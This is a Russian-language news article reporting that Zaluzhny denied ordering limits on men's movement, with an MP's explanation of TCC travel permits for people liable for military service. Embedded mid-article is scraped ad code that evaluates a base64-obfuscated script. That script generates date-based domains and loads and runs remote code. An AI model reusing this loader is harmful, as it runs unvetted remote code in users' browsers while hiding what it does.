Залужный не давал распоряжений ограничивать перемещение Украиной мужчин в ближайшее время

Главнокомандующий ВСУ Залужный не давал никаких указаний на препятствование перемещению мужчин в ближайшие дни.

Об этом сообщил главнокомандующий в своем Telegram-канале, информирует Акцент.

«Уважаемые граждане – призывники и военнообязанные! Напоминаю, идет война. Вы нужны своему государству! Все, кто до сих пор не стоит или не восстановился на военном учете, должны это сделать. Те, кто планирует выезд за пределы своих районов и областей, должны взять разрешение в ТЦК. Никаких указаний на препятствование перемещению лиц в ближайшие дни со стороны военного командования не предоставлялось», — отметил Залужный.

Также, главнокомандующий ВСУ опубликовал бланк заявления и бланк разрешения, размещенные на сайте Министерства обороны.

Источник: сайт МО

В то же время конкретных сроков получения разрешений главнокомандующий ВСУ не назвал.

Как и где получать разрешение для выезда с места жительства: разъяснение нардепа

Народный депутат и юрист Денис Маслов разъяснил в своём Telegram-канале, кому, как и где нужно получить разрешение на выезд с места жительства: он подчеркнул, что теперь для выезда с места жительства требуется разрешение.

«Сразу отмечу – речь идет о военнообязанных и действует во время военного положения. Отныне находящийся на военном учете сможет выехать за пределы места своего проживания (нахождения) только с разрешения руководителя соответствующего ТЦК и СП», — отметил нардеп.

Далее — текст публикации Дениса Маслова.

Почему именно сейчас введено такое правило?

На самом деле, это было предусмотрено ещё с 2006 года ч. 4 ст. 37 Закона «О воинской обязанности и военной службе». Долгое время отсутствовал порядок процедуры получения соответствующего разрешения на выезд. Так что норма фактически не работала. Такой порядок был разработан Минобороны 28 июня 2022 года. Хорошо это или плохо – но оно есть. Попробуем разобраться, что собой представляет этот порядок.

Кого касается такой запрет на выезд?

Призывников, военнообязанных и резервистов.

Какая ответственность?

По меньшей мере, за нарушение запрета может быть админответственность в виде штрафа от 510 до 850 грн (статья 210 Кодекса Украины об административных правонарушениях). var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Где и как получить разрешение на выезд?

Обратиться с соответствующим заявлением в ВСК и СП (районное или городское), к которому вы приписаны.

Кто может получить разрешение и на какой срок?

Призывники, которые:

имеют отсрочку от призыва (разрешение на 1 год);в случае болезни и других уважительных причин (разрешение до 30 дней).

Военнообязанные и резервисты, которые:

не подлежат призыву во время мобилизации (разрешение на 1 год);забронированные (по ходатайству органа бронирования, не более 30 суток);в случае болезни и других уважительных причин (разрешение до 30 дней). Кто может не получать разрешение и на кого не распространяется запрет?

Граждане Украины, которые:

исключены из военного учёта (служат в ВСУ, признаны непригодными к службе с исключением из военного учёта и т.п.).забронированы и выбывают в командировку;сняты с военного учёта и выбывают в другую местность к новому месту жительства.

На данный момент важно, что не обозначены сроки получения таких разрешений, а также разъяснения относительно места проживания (нахождения).

«Повторюсь, что такой порядок действует на период военного времени. Есть вопросы по месту жительства, сроки. Нуждается в уточнении. Уже направил депутатское обращение в Минобороны. Сообщу», — отметил нардеп и юрист.

Информация будет дополняться.

Как ранее сообщал Акцент, в Геншабе просят «с пониманием относится к регуляторным мерам, продиктованным законами Украины».

В ВСУ официально пояснили выдачу спецразрешений на выезд с места жительства

Также, как информировал Акцент, в Запорожской ОВА вчера выпустили сообщение о том, что военнообязанные для выезда с места жительства должны получить разрешение в военкомате. Новость вызвала настоящий переполох в обществе, ведь никаких нормативных документов для этого на данный момент не было опубликовано. (adsbygoogle = window.adsbygoogle || []).push({});

Выезд с места жительства через военкомат: кого может коснуться Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/zaluzhnyj-ne-daval-rasporyazhenij-ogranichivat-peremeshhenie-ukrainoj-muzhchin-v-blizhajshee-vremya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top